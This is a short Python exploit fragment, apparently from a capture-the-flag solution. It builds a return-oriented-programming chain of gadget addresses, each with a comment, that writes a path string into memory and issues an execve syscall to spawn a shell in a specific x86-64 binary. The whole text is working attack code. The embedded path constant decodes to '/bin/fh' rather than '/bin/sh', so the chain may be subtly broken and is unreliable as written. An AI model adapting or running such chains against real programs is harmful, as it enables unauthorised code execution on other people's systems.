payload = p64(0x4023dc)
#0x00000000004023dc: pop rbx; pop r14; pop r15; pop rbp; ret; 
payload += p64(0x41f070)+p64(0x68662f6e69622f)+p64(0x0)+p64(0x0)+p64(0x40659b)
# 0x000000000040659b: mov qword ptr [rbx], r14; xor eax, eax; pop rbx; pop r14; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0xfffffe80)+p64(0x405473)
# 0x0000000000405473: push rbp; mov rbp, rsp; lea rax, [rdi + 0x180]; pop rbp; ret; 
payload += p64(0x4058cd)
# 0x00000000004058cd: xchg eax, edx; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0xfffffffffffffebb)+p64(0x405473)
# 0x0000000000405473: push rbp; mov rbp, rsp; lea rax, [rdi + 0x180]; pop rbp; ret; 
payload += p64(0x402040)
# 0x0000000000402040: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x41f070)+p64(0x411523)
# 0x0000000000411523: syscall; 
payload += b''
